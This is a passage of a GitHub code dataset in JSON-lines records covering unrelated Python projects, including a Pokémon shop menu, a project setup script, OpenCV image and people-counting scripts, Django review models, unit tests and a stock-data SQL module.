decimal;","repo_name":"GabriellyBailon/Cursos","sub_path":"CursoEmVideo/Python/Mundo 1/ex008.py","file_name":"ex008.py","file_ext":"py","file_size_in_byte":453,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"5010772252","text":"from Controleur.abstractView import AbstractView\n\nfrom PyInquirer import prompt, Separator\n\nclass AchatView(AbstractView):\n def __init__(self, session):\n super().__init__(session)\n # regarder quels types de questions sont adéquats\n self.question1 = [\n {\"type\": \"list\",\n \"name\": \"action\",\n \"message\": \"Quel Type de Pokéball souhaitez vous acheter ?\",\n \"choices\":[\"Acheter une pokéball\",\n Separator(),\n \"Acheter une superball\",\n Separator(),\n \"Acheter une hyperball\",\n Separator(),\n \"Revenir plus tard\"\n ]}]\n self.question2 = [\n {'type': 'input',\n 'name': 'quantite',\n 'message': 'Combien en voulez-vous ?'\n }]\n\n def display_info(self):\n super().display_info()\n with open('assets/boutique', 'r', encoding=\"utf-8\") as asset:\n print(asset.read())\n\n def make_choice(self):\n from Controleur.actionView import ActionView\n from Service.achat import Achat\n achat = Achat(self._session.joueur_actif)\n next_view = 
ActionView(self._session)\n ras = False\n i=0\n while ras == False:\n if i != 0:\n with open('assets/border.txt', 'r', encoding=\"utf-8\") as asset:\n print(asset.read())\n i += 1\n achat.afficher_inv()\n response1 = prompt(self.question1)\n if response1[\"action\"] == \"Revenir plus tard\":\n ras = True\n else:\n if response1[\"action\"] == \"Acheter une pokéball\":\n type = \"pokeball\"\n elif response1[\"action\"] == \"Acheter une superball\":\n type = \"superball\"\n elif response1[\"action\"] == \"Acheter une hyperball\":\n type = \"hyperball\"\n response2 = prompt(self.question2)\n quantite=response2[\"quantite\"]\n achat.acheter(type, quantite, self._session.joueur_actif)\n return next_view\n","repo_name":"ChatBear/Pokemon-Ensai-projet-","sub_path":"Controleur/achatView.py","file_name":"achatView.py","file_ext":"py","file_size_in_byte":2186,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"71183036673","text":"import subprocess\nimport sys\nimport os\n\ntry:\n import pip\nexcept ImportError:\n sys.stderr.write('Please install pip and then re-run this script.\\nFor installation instructions visit: ' +\n 'https://pip.pypa.io/en/stable/installing/\\n')\n sys.exit(7)\n\n\ndef check_project_structure(modules, packages, dirs):\n root = os.path.dirname(os.path.abspath(__file__))\n\n for dir in dirs:\n path = os.path.join(root, dir)\n if not os.path.exists(path) or not os.path.isdir(path):\n sys.stderr.write('directory: {} is missing / invalid!\\n'.format(dir))\n sys.exit(2)\n\n for package in packages:\n path = os.path.join(root, package)\n if not os.path.exists(path) or not os.path.isdir(path) or not os.path.exists(os.path.join(path, '__init__.py')):\n sys.stderr.write('package: {} is missing / invalid!\\n'.format(dir))\n sys.exit(3)\n\n for module in modules:\n path = os.path.join(root, module)\n if not os.path.exists(path) or not os.path.isfile(path):\n sys.stderr.write('module: {} is missing / invalid!\\n'.format(module))\n sys.exit(4)\n\n sys.stdout.write('project...OK\\n')\n\n\ndef parse_dependencies():\n path = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'dependencies.txt')\n if not os.path.exists(path):\n sys.stderr.write('Missing dependencies.txt!')\n sys.exit(1)\n\n dependencies = []\n with open(path, 'r') as f:\n line = f.readline()\n while line:\n hashtag_index = -1\n for i in range(0, len(line)):\n if line[i] == '#':\n hashtag_index = i\n break\n\n if hashtag_index >= 0:\n line = line[:hashtag_index]\n\n if len(line) > 0:\n if line[0] != '#':\n line = line.strip()\n dependencies.append(line)\n\n line = f.readline()\n\n return dependencies\n\n\ndef exec_pip(dependency):\n command = ['python', '-m', 'pip', 'install', dependency]\n\n try:\n subprocess.check_call(command, stderr=subprocess.DEVNULL, stdout=subprocess.DEVNULL)\n sys.stdout.write(dependency + '...OK\\n')\n except subprocess.CalledProcessError as e:\n sys.stderr.write(str(e) + '\\n' + dependency + '...BAD\\n')\n\n\ndef check_version(min_version, max_version=None):\n sys_version = sys.version_info\n\n if max_version is None:\n if sys_version >= min_version:\n sys.stdout.write('Python version: {}...OK\\n'.format(sys.version))\n else:\n sys.stderr.write('Python version: {}...BAD\\nThis version does not meet the minimum version of: {}\\n'.format(\n sys.version, min_version))\n sys.exit(5)\n elif min_version > max_version:\n sys.stderr.write('Setup configuration error!\\nminimum version cannot exceed maximum version!\\n')\n sys.exit(6)\n else:\n if 
sys_version < min_version:\n sys.stderr.write('Python version: {}...BAD\\nThis version does not meet the minimum version of: {}\\n'.format(\n sys.version, min_version))\n sys.exit(5)\n elif sys_version > max_version:\n sys.stderr.write('Python version: {}...BAD\\nThis version exceeds the maximum version of: {}\\n'.format(\n sys.version, max_version))\n sys.exit(7)\n else:\n sys.stdout.write('Python version: {}...OK\\n'.format(sys.version))\n\n\ntitle = 'Python 3 Project template'\ndescription = 'A project template for python 3'\nauthor = 'Dylan David Randall'\nauthor_email = 'dylan.d.randall@gmail.com'\nversion = '0.0.0'\ndownload_url = ''\nmin_version = (3, 0, 0)\nmax_version = (3, 9, 9)\n\ndirs = ['logs']\npackages = ['injection', 'logger']\nmodules = ['definitions.py', 'dependencies.txt']\n\n\nlogo = '#----------------------------------------------------------------#\\n'\nlogo += '| ____ _ _ _____ _ |\\n'\nlogo += '| / __ \\ (_) | | / ____| | | |\\n'\nlogo += '| | | | |_ _ _ ___| | __ | (___ ___| |_ _ _ _ __ |\\n'\nlogo += '| | | | | | | | |/ __| |/ / \\___ \\ / _ \\ __| | | | \\'_ \\ |\\n'\nlogo += '| | |__| | |_| | | (__| < ____) | __/ |_| |_| | |_) | |\\n'\nlogo += '| \\___\\_\\\\\\__,_|_|\\___|_|\\_\\ |_____/ \\___|\\__|\\__,_| .__/ |\\n'\nlogo += '| | | |\\n'\nlogo += '| |_| |\\n'\nlogo += '| |\\n'\nlogo += '#----------------------------------------------------------------#\\n'\nlogo += '| By Dylan Randall |\\n'\nlogo += '#----------------------------------------------------------------#'\n\nprint(logo)\nsave_details = input(\"\\nsave details to INFO.txt ? [y/n]: \")\nsave_details = save_details.lower()\n\nsys.stdout.write('\\nchecking python version...\\n')\ncheck_version(min_version, max_version)\n\nsys.stdout.write('\\nchecking project structure...\\n')\ncheck_project_structure(modules, packages, dirs)\n\ndependencies = parse_dependencies()\nif len(dependencies) > 0:\n sys.stdout.write('\\nsetting up dependencies... 
(this may take some time)\n')\n    for dependency in dependencies:\n        exec_pip(dependency)\n\ndetails = 'Details\\n-------\\nTitle: ' + title + '\\nVersion: ' + version + '\\n' + 'Description: ' + description + '\\n'\\\n    + 'Author: ' + author + '\\n' + 'Author\\'s Email: ' + author_email + '\\n'\n\nif download_url:\n    details += 'Download URL: ' + download_url + '\\n'\n\nif len(dependencies) > 0:\n    details += '\\nDependencies:\\n'\n    for dependency in dependencies:\n        details += dependency + '\\n'\n\nsys.stdout.write('\\nquick setup finished\\n\\n' + details)\n\nif len(save_details) > 0:\n    if save_details[0] == 'y':\n        with open('INFO.txt', 'w+') as f:\n            f.write(details)\n\nsys.stdout.write(\"\\nfinished\\n\")\n","repo_name":"HOWZ1T/-python-3-_project_template","sub_path":"quick_setup.py","file_name":"quick_setup.py","file_ext":"py","file_size_in_byte":5996,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"}
+{"seq_id":"4026592713","text":"import sys\n\ndef count_movies_by_genre(input_file, output_file):\n    genre_count = {}\n\n    with open(input_file, 'r', encoding='latin-1') as file:\n        for line in file:\n            _, _, genres = line.strip().split('::')\n            movie_genres = genres.split('|')\n\n            for genre in movie_genres:\n                if genre in genre_count:\n                    genre_count[genre] += 1\n                else:\n                    genre_count[genre] = 1\n\n    with open(output_file, 'w') as output:\n        for genre, count in genre_count.items():\n            output.write(f\"{genre} {count}\\n\")\n\nif __name__ == \"__main__\":\n    if len(sys.argv) != 3:\n        print(\"Usage: python3 IMDBStudent<20210801>.py \")\n        sys.exit(1)\n\n    input_file = sys.argv[1]\n    output_file = sys.argv[2]\n\n    count_movies_by_genre(input_file, output_file)\n    print(output_file)\n","repo_name":"DoGyeongL/BigdataProcess","sub_path":"student<20210801>.py","file_name":"student<20210801>.py","file_ext":"py","file_size_in_byte":893,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"25019828716","text":"# Definition for singly-linked list.\n# class ListNode:\n#     def __init__(self, x):\n#         self.val = x\n#         self.next = None\n\nclass Solution:\n    def deleteNode(self, node):\n        \"\"\"\n        :type node: ListNode\n        :rtype: void Do not return anything, modify node in-place instead.\n        \"\"\"\n        #we make a check if the list has less than 2 nodes.\n        if node == None or node.next == None:\n            return\n        \n        \"\"\"\n        we set the current node's next's value.\n        Then we make the current node point\n        to the node's next's next node.\n        \"\"\"\n        node.val = node.next.val\n        node.next = node.next.next\n        \n        return","repo_name":"uclaacm/cs32-interview-prep20","sub_path":"Workshop2_Linked Lists/Warmup_.py","file_name":"Warmup_.py","file_ext":"py","file_size_in_byte":692,"program_lang":"python","lang":"en","doc_type":"code","stars":30,"dataset":"github-code","pt":"61"}
+{"seq_id":"71732788355","text":"import cv2\r\nimport os\r\nimport numpy as np\r\nroute = '../output/testov'\r\nfiles = os.listdir(route)\r\nfor fil in files:\r\n    if fil != 'output':\r\n        path = os.path.join(route,fil)\r\n        l = os.listdir(path)\r\n        img_stack = []\r\n        for fi in l:\r\n            # print(fi)\r\n            img_stack.append(cv2.imread(os.path.join(path,fi)))\r\n        cv2.imshow('im1',img_stack[0])\r\n        cv2.imshow('im2',img_stack[1])\r\n        im1 = img_stack[0].astype(float)\r\n        im2 = img_stack[1].astype(float)\r\n        # plus and divide by 2\r\n        im3 = ((img_stack[0].astype(float) + img_stack[1].astype(float))/2)\r\n        im3 = cv2.normalize(im3, None, 0, 255, cv2.NORM_MINMAX, cv2.CV_8U)\r\n\r\n        # max\r\n        im4 = 
np.maximum(im1,im2)\r\n im4 = cv2.normalize(im4, None, 0, 255, cv2.NORM_MINMAX, cv2.CV_8U)\r\n \r\n save = '../output/testov/output'\r\n cv2.imwrite(os.path.join(save,fil + '-im3.png'),im3)\r\n cv2.imwrite(os.path.join(save,fil + '-im4.png'),im4)","repo_name":"thanaphon0737/pytorch-vita-apply-text-replacement","sub_path":"merge2pic.py","file_name":"merge2pic.py","file_ext":"py","file_size_in_byte":1011,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"72059917635","text":"import pytest\ndef fibonnaci(n):\n if n < 2:\n return n # base da recursao, o inicio\n else:\n return fibonnaci(n-1) + fibonnaci(n-2) # Chamada recursiva\n\n@pytest.mark.parametrize(\"entrada, esperado\", [\n (0, 0),\n (1, 1),\n (2, 1),\n (3, 2),\n (4, 3),\n (5, 5),\n (6, 8),\n (7, 13)\n ])\n\ndef testa_fibonacci(entrada, esperado):\n assert fibonnaci(entrada) == esperado\n\n","repo_name":"felipefazani/Aprendendo","sub_path":"PYTHON/02POO/06Recursao/Fibonnaci.py","file_name":"Fibonnaci.py","file_ext":"py","file_size_in_byte":425,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"16226121879","text":"'''\nCreated on Mar 6, 2014\n\n@author: xapharius\n'''\nimport unittest\nimport utils.numpyutils as nputils\nimport numpy as np\nimport sys\nfrom _ast import Assert\n\nclass numpyutilsTest(unittest.TestCase):\n\n \n def testaddOneToVec(self):\n '''\n Test valid execution of one-dim, row and column vector\n '''\n #vector array\n vec = np.array([1,2,3])\n vecOne = nputils.add_one_to_vec(vec)\n assert vecOne.shape[0] == 1 and vecOne.shape[1] == vec.shape[0]+1, \"anddOneToVec fails for normal vec (x,)\"\n \n #row vector array\n vec = np.array([[1,2,3]])\n vecOne = nputils.add_one_to_vec(vec)\n assert vecOne.shape[0] == 1 and vecOne.shape[1] == vec.shape[1]+1, \"anddOneToVec fails for row vec (1,x)\"\n \n #row vector array\n vec = np.array([[1],[2],[3]])\n vecOne = nputils.add_one_to_vec(vec)\n assert vecOne.shape[1] == 1 and vecOne.shape[0] == vec.shape[0]+1, \"anddOneToVec fails for row vec (1,x)\"\n \n def testaddOneToVec_neg(self):\n '''\n Test exception in case of matrix as parameter\n '''\n \n mat = np.array([[1,2,3],[4,5,6]])\n try:\n nputils.add_one_to_vec(mat)\n assert(False)\n except:\n expected_errmsg = \"addOne works only for one dimensional vectors\"\n errmsg = str(sys.exc_info()[1])\n assert(errmsg.startswith(expected_errmsg))\n \nif __name__ == \"__main__\":\n #import sys;sys.argv = ['', 'Test.testName']\n unittest.main()","repo_name":"xapharius/mrEnsemble","sub_path":"Engine/src/tests/utils/numpyutilsTest.py","file_name":"numpyutilsTest.py","file_ext":"py","file_size_in_byte":1550,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"41518631743","text":"\nimport unittest\nfrom os import listdir\nfrom os.path import isfile, join\n\nfrom SunScreenServer.GetSecrets import get_secrets\nfrom SunScreenServer.OpenPosCalc import get_open_percentage_required, open_percentage_required, round_to_nearest\nfrom SunScreenServer.SunPositionCalcs import DEG_TO_RAD\n\n\nclass OpenPosCalcTest(unittest.TestCase):\n\n secrets = get_secrets()\n\n def test_open_pos(self):\n self.assertEqual(int(24.46524406), open_percentage_required(49.83*DEG_TO_RAD, -1.158375025))\n\n def test_open_pos_with_adjustment(self):\n self.assertEqual(int(24.46524406) + 10, open_percentage_required(49.83*DEG_TO_RAD, -1.158375025, adjustment=10))\n\n\n def test_round_to_nearest(self):\n 
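# Annotation, not from the original source: taken together, the assertions below imply that\n        # round_to_nearest(v, n) rounds v *up* to the next multiple of n (0 -> 0; 1, 50, 51 -> 50, 50, 100).\n        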
self.assertEqual(0, round_to_nearest(0, 50))\n self.assertNotEqual(0, round_to_nearest(1, 50))\n self.assertEqual(50, round_to_nearest(1, 50))\n self.assertEqual(50, round_to_nearest(50, 50))\n self.assertEqual(100, round_to_nearest(51, 50))\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"jcjveraa/sunscreen-controller","sub_path":"server_script/tests/OpenPositionCalc_test.py","file_name":"OpenPositionCalc_test.py","file_ext":"py","file_size_in_byte":1026,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"10316191880","text":"from django.contrib.auth import get_user_model\nfrom django.core.validators import MaxValueValidator, MinValueValidator\nfrom django.db import models\n\nfrom .validators import validate_year\n\nUser = get_user_model()\n\n\nclass CategoryGenreBase(models.Model):\n name = models.CharField(verbose_name=\"Название\", max_length=256)\n slug = models.SlugField(\n verbose_name=\"Уникальный слаг\", max_length=50, unique=True\n )\n\n class Meta:\n abstract = True\n ordering = (\"name\",)\n\n def __str__(self):\n return self.name\n\n\nclass Category(CategoryGenreBase):\n class Meta(CategoryGenreBase.Meta):\n verbose_name = \"Категория\"\n verbose_name_plural = \"Категории\"\n\n\nclass Genre(CategoryGenreBase):\n class Meta(CategoryGenreBase.Meta):\n verbose_name = \"Жанр\"\n verbose_name_plural = \"Жанры\"\n\n\nclass Title(models.Model):\n name = models.CharField(verbose_name=\"Название\", max_length=256)\n year = models.PositiveSmallIntegerField(\n verbose_name=\"Дата выхода\", db_index=True, validators=[validate_year]\n )\n description = models.TextField(\n verbose_name=\"Описание\", null=True, blank=True\n )\n genre = models.ManyToManyField(\n Genre,\n verbose_name=\"Жанр\",\n related_name=\"titles\",\n )\n category = models.ForeignKey(\n Category,\n verbose_name=\"Категория\",\n on_delete=models.SET_NULL,\n related_name=\"titles\",\n null=True,\n )\n\n class Meta:\n ordering = (\"name\",)\n verbose_name = \"Произведение\"\n verbose_name_plural = \"Произведения\"\n\n def __str__(self):\n return self.name\n\n\nclass Review(models.Model):\n title = models.ForeignKey(\n Title, on_delete=models.CASCADE, related_name=\"reviews\"\n )\n text = models.TextField(verbose_name=\"text field\")\n author = models.ForeignKey(\n User, on_delete=models.CASCADE, related_name=\"comments\"\n )\n score = models.PositiveSmallIntegerField(\n verbose_name=\"Score\",\n null=True,\n validators=[MinValueValidator(1), MaxValueValidator(10)],\n )\n pub_date = models.DateTimeField(\"Pub-date\", auto_now_add=True)\n\n class Meta:\n constraints = [\n models.UniqueConstraint(\n fields=[\"author\", \"title\"], name=\"unique_author_review\"\n )\n ]\n verbose_name = \"Отзыв\"\n verbose_name_plural = \"Отзывы\"\n\n\nclass Comment(models.Model):\n review = models.ForeignKey(\n Review, on_delete=models.CASCADE, related_name=\"comments\"\n )\n text = models.TextField(verbose_name=\"text_field\")\n author = models.ForeignKey(\n User, on_delete=models.CASCADE, related_name=\"reviews\"\n )\n pub_date = models.DateTimeField(\"Pub-date_\", auto_now_add=True)\n\n class Meta:\n verbose_name = \"Комментарий\"\n verbose_name_plural = \"Комментарии\"\n","repo_name":"tarki2206/group_project","sub_path":"api_yamdb/reviews/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3003,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23426509561","text":"T = int(input())\n\nfor i 
in range(1, T+1):\n time = 0\n crate = 2.0\n cost, frate, goal = list(map(float, input().split())) # factory cost, factory cookie rate, goal\n\n while(1):\n tfinal = goal / crate\n tneeded = cost / crate\n trec = tneeded + (goal / (crate+frate))\n\n if (trec < tfinal):\n time += tneeded\n crate += frate\n else:\n time += tfinal\n break\n\n print ('Case #%s: %.7f' % (i, time))\n\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_136/2980.py","file_name":"2980.py","file_ext":"py","file_size_in_byte":481,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"21954275256","text":"PLOT = False\n\nimport nose\nif PLOT:\n import matplotlib\n import matplotlib.pyplot as plt\nimport numpy as np\n\nfrom motion_plan import plan\n\nRESOLUTION = 0.001\nEPSILON = 0.005\n\nif PLOT: _, ax = plt.subplots()\n\ndef setup():\n pass\n\ndef teardown_plot():\n if PLOT:\n ax.set(xlabel=\"t (s)\", ylabel=\"s\", title=\"Planned Motion\")\n ax.grid()\n plt.show()\n\n@nose.with_setup(setup, teardown_plot)\ndef test_plan():\n parameter_sets_to_test = [\n #s_start, s_end, v_start, v_max, a_max\n [0.0, 0.0, 0.0, 1, 1],\n [0.0, 0.0, 1.0, 1, 1],\n [0.0, 2.0, 0.0, 1, 1],\n [0.0, 2.0, 0.0, 2, 4],\n [1.0, 2.0, 0.1, 2, 4],\n [1.0, -2.0, 1.0, 2, 4],\n [1.0, -2.0, -1.0, 2, 4],\n [-2.0, 2.0, 0.0, 1, 1],\n [-2.0, -0.5, 0.0, 1, 1],\n [0.0, 1.0, 0.5, 1, 1],\n [0.0, 1.0, 0.0, 1, 2],\n [0.0, 0.5, 0.0, 1, 2],\n [0.0, 0.5, 1.0, 1, 1], # Break only.\n [0.0, -0.1, -1, 1, 1],\n [0.0, 0.1, 1, 1, 1],\n [0.0, 0.2, 1, 1, 1], # Overshoots.\n [0.0, -1.0, 0, 1, 1], # Falling motion.\n [1.0, 0.2, 1, 1, 1],\n ]\n\n for parameter_set in parameter_sets_to_test:\n print()\n print(\"s_start = {}, s_end = {}, v_start = {}, v_max = {}, a_max = {}\".format(*parameter_set))\n s, duration = plan(*parameter_set)\n print(\"duration = {}\".format(duration))\n ts = np.arange(0, duration + RESOLUTION, RESOLUTION)\n s_ts = np.array([s(t) for t in ts])\n\n s_start, s_end, v_start, v_max, a_max = parameter_set\n # Check planned motion.\n assert abs(s(0) - s_start) < EPSILON\n assert abs(s(duration) - s_end) < EPSILON\n # Check that velocity is continuous (no jumps).\n v_before = v_start\n for i in range(int((duration + RESOLUTION) // RESOLUTION)):\n if i == 0: continue\n # Check derivations using difference quotient approximation.\n v_current = (s_ts[i] - s_ts[i - 1]) / RESOLUTION\n assert abs(v_current) <= v_max + EPSILON\n if i == 1: assert abs(v_current - v_start) < EPSILON\n a_current = (v_current - v_before) / RESOLUTION\n assert abs(a_current) <= a_max + EPSILON\n v_before = v_current\n\n if PLOT: ax.plot(ts, s_ts)\n\nnose.main()\n","repo_name":"oberger4711/nerf2face","sub_path":"src/control/scripts/motion_plan/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2634,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"71812617474","text":"import os\n\nclass Config:\n def __init__(self):\n self.frontendUrls = [\"http://localhost:4200\", \"https://portfolio.codieorberson.com\"]\n self.storageName = \"codieportfolio\"\n self.containerName = \"chatgpt\"\n\n self.storageKey = os.environ.get(\"STORAGE_KEY\")\n self.chatGptApiKey = os.environ.get(\"CHATGPT_API_KEY\")\n self.orgId = os.environ.get(\"ORG_ID\")\n self.storageConnectionString = 
os.environ.get(\"STORAGE_CONNECTION_STRING\")","repo_name":"codieorberson/ChatGpt-Showcase","sub_path":"Configs/Config.py","file_name":"Config.py","file_ext":"py","file_size_in_byte":488,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"40648126155","text":"# Code to count people in and out of a room/area\nimport cv2 # OpenCV library\nimport numpy as np # Numpy library\n\nvideo = cv2.VideoCapture(\"People-Counter\\escalator.mp4\") # Video capture object\n\ncounter = 0 # Counter to count people in and out of the room/area\nreleased = False # Boolean to check if the person has been counted or not\n\nwhile True:\n ret, img = video.read() # Read video frame by frame\n # cv2.imshow(\"Video\", img)\n # cv2.waitKey(0) # Show video frame by frame\n # break\n # print(img.size) # Print image shape\n img = cv2.resize(\n img,\n (1100, 720),\n ) # Resize frame\n # img = cv2.resize(img,) # Resize video frame\n imgGray = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY) # Convert video frame to grayscale\n x, y, w, h = 490, 230, 30, 150 # Set ROI coordinates\n imgTh = cv2.adaptiveThreshold(\n imgGray, 255, cv2.ADAPTIVE_THRESH_GAUSSIAN_C, cv2.THRESH_BINARY_INV, 11, 12\n ) # Apply adaptive threshold to grayscale image to get binary image\n kernel = np.ones((8, 8), np.uint8) # Kernel for dilation\n imgDil = cv2.dilate(imgTh, kernel, iterations=2) # Dilate binary image\n\n clip = imgDil[y : y + h, x : x + w] # Clip the box from the image ##recorte\n white = cv2.countNonZero(\n clip\n ) # Count the number of white pixels in the box ##brancos\n\n if (\n white > 4000 and released == True\n ): # If white pixels are more than 4000 and the person is not released\n counter += 1 # Increment counter\n if white < 4000: # If white pixels are less than 4000\n released = True # Set released to True\n else:\n released = False\n\n if released == False: # If person is not released\n cv2.rectangle(\n img, (x, y), (x + w, y + h), (0, 255, 0), 4\n ) # Draw green rectangle\n else:\n cv2.rectangle(\n img, (x, y), (x + w, y + h), (255, 0, 255), 4\n ) # Draw magenta rectangle\n\n # cv2.putText(img, str(white), (x - 30, y - 50), cv2.FONT_HERSHEY_SIMPLEX, 1, (255, 255, 255), 1,) #print number of white pixels\n # cv2.rectangle(img, (575, 155), (575 + 88, 155 + 85), (255, 255, 255), -1) # Draw a rectangle to cover the counter\n cv2.putText(\n img,\n str(counter),\n (x + 100, y + 100),\n cv2.FONT_HERSHEY_SIMPLEX,\n 3,\n (255, 0, 0),\n 5,\n ) # Display the number of people in the box\n\n cv2.imshow(\"Video\", img)\n cv2.waitKey(20) # Show video frame by frame\n","repo_name":"MayeshMohapatra/CV-tasks","sub_path":"People-Counter/PeopleCounter.py","file_name":"PeopleCounter.py","file_ext":"py","file_size_in_byte":2485,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"28499502429","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n\n# 03/07/2018\n\nimport os, sys\nfrom sortscaffolds import Gene, Scaffold, Data, getTabelas\n\n__author__ = \"Miquéias Fernandes\"\n__copyright__ = \"Copyright 2018 mikeias.net\"\n__license__ = \"MIT\"\n__version__ = \"1.1\"\n\n\ndef process(fasta, gff):\n\n print('importando as informações ...')\n ret = getTabelas(fasta, gff)\n genes = ret[1]\n\n fo = open(fasta + '.genes.fa', \"w\")\n\n for gene in genes:\n fo.write(\">\" + gene.nome + '\\n')\n fo.write(gene.getSeq() + '\\n')\n fo.close()\n\n\nif __name__ == \"__main__\":\n 
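# Annotation, not from the original source: the sys.argv.extend(...) call below injects hard-coded\n    # developer paths for local testing; remove it to pass scaffolds.fasta and genes.gff on the command line.\n    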
sys.argv.extend(['/home/mfernandes/Documentos/relatorio_mestrado/julho/homology_ecalyptus/egrand.3.fa',\n                     '/home/mfernandes/Documentos/relatorio_mestrado/julho/homology_ecalyptus/egrand.gff'])\n\n    if len(sys.argv) < 3:\n        print(\"use: ./extract_fasta_from_gff.py scaffolds.fasta genes.gff\")\n    else:\n        process(sys.argv[1], sys.argv[2])\n","repo_name":"MiqueiasFernandes/bioinformatics","sub_path":"extract_fasta_from_gff.py","file_name":"extract_fasta_from_gff.py","file_ext":"py","file_size_in_byte":943,"program_lang":"python","lang":"pt","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"}
+{"seq_id":"3240808743","text":"import pandas as pd\nimport matplotlib.pyplot as plt\n\nimport sys\n\nprint ('Number of arguments:', len(sys.argv), 'arguments.')\nprint ('Argument List:', str(sys.argv))\ndt = float(sys.argv[1])\nxlabel = str(sys.argv[2])\nlegend = str(sys.argv[3])\nmultiplot = sys.argv[4].lower() in ('1', 'true', 'yes')\n\ndf = pd.read_csv('tmp.txt', header=None)\ndf.index += 1\ndf.index *= dt\n\nif multiplot:\n\tdf2 = pd.read_csv('tmp2.txt', header=None)\n\tdf2.index += 1\n\tdf2.index *= dt\n\n\tdf3 = pd.concat([df, df2], axis=1)\n\tdf3.columns = [\"newton\", \"stressvel\"]\n\tdf3.index.name=\"day\"\n\tdf3.to_csv(\"2km.csv\", na_rep=' ')\n\tax = df3.plot(style='-o', logy=True, markersize=4)\n\tax.set_xlabel(xlabel)\n\tax.legend([\"stdnewton\", \"stressvel\"])\n\t#ax.set_title(\"mesh size 4km; delta_min = 2e-10\", fontsize=12)\n\tax.set_ylim([2,500]);\nelse:\n\tdf3 = df\n\tax = df3.plot(style='-o', logy=True, markersize=4)\n\tax.set_xlabel(xlabel)\n\tax.legend([legend])\n\nplt.savefig('conv.png')\nplt.show()\n\n","repo_name":"MelodyShih/SeaIce_svNewton","sub_path":"plotdata.py","file_name":"plotdata.py","file_ext":"py","file_size_in_byte":941,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"37638981932","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Mar 10 21:11:51 2016\n\n@author: who8736\n\"\"\"\n\nimport os\nimport logging\n# import urllib2\n# import socket\nimport datetime as dt\nfrom datetime import datetime\n# import ConfigParser\n# import re\n# import time\n\n# import sys\n\n\n# from lxml import etree\n# import lxml\n# import tushare as ts  # @UnresolvedImport\nimport pandas as pd\n# from pandas.compat import StringIO\nfrom io import StringIO\n# from sqlalchemy import create_engine\nfrom sqlalchemy import MetaData, Table, Column\nfrom sqlalchemy import DATE, DECIMAL, String\nfrom sqlalchemy.ext.declarative import declarative_base\n# from sqlalchemy.orm import sessionmaker, scoped_session\n# import sqlalchemy\nfrom pandas.core.frame import DataFrame\n# from tushare.stock import cons as ct\nimport xlrd\nimport tushare as ts\n\nimport datatrans\nimport initsql\nfrom sqlconn import SQLConn\n# from misc import filenameGuben, filenameLirun, filenameGuzhi\nfrom misc import filenameLirun, filenameGuzhi\nfrom initlog import initlog\n\n# from download import downHYFile\n\n# from bokeh.sampledata import stocks\n\n\nsqlconn = SQLConn()\nengine = sqlconn.engine\nSession = sqlconn.Session\n\n\ndef writeHYToSQL(filename):\n    \"\"\" 从文件中读取行业与股票对应关系并写入数据库\n    \"\"\"\n    filename = os.path.join('./data', filename)\n    xlsFile = xlrd.open_workbook(filename, encoding_override=\"cp1252\")\n    table = xlsFile.sheets()[4]\n    ts_codeList = table.col_values(0)[1:]\n    ts_codeList = [i + ('.SH' if i[0] == '6' else '.SZ') for i in ts_codeList]\n    hyIDList = table.col_values(8)[1:]\n    hyDf = pd.DataFrame({'ts_code': ts_codeList, 'classify_code': 
hyIDList})\n engine.execute('TRUNCATE TABLE classify_member')\n writeSQL(hyDf, 'classify_member')\n\n\ndef writeHYNameToSQL(filename):\n filename = os.path.join('./data', filename)\n xlsFile = xlrd.open_workbook(filename, encoding_override=\"cp1252\")\n table = xlsFile.sheets()[0]\n hyIDList = table.col_values(0)[1:]\n hyNameList = table.col_values(1)[1:]\n hyLevelList = [len(hyID) / 2 for hyID in hyIDList]\n hyLevel1IDList = [hyID[:2] for hyID in hyIDList]\n hyLevel2IDList = [hyID[:4] for hyID in hyIDList]\n hyLevel3IDList = [hyID[:6] for hyID in hyIDList]\n hyNameDf = pd.DataFrame({'code': hyIDList,\n 'name': hyNameList,\n 'level': hyLevelList,\n 'level1id': hyLevel1IDList,\n 'level2id': hyLevel2IDList,\n 'level3id': hyLevel3IDList})\n engine.execute('TRUNCATE TABLE classify')\n writeSQL(hyNameDf, 'classify')\n\n\ndef writeGubenToSQL(gubenDf, replace=False):\n \"\"\"单个股票股本数据写入数据库\n :param replace:\n :type gubenDf: DataFrame\n \"\"\"\n tablename = 'guben'\n # lastUpdate = gubenUpdateDate(ts_code)\n # gubenDf = gubenDf[pd.Timestamp(gubenDf.date) > lastUpdate]\n # gubenDf = gubenDf[gubenDf.date > lastUpdate]\n if gubenDf.empty:\n return None\n if replace:\n for index, row in gubenDf.iterrows():\n sql = (('replace into guben'\n '(ts_code, date, totalshares) '\n 'values(\"%s\", \"%s\", %s)')\n % 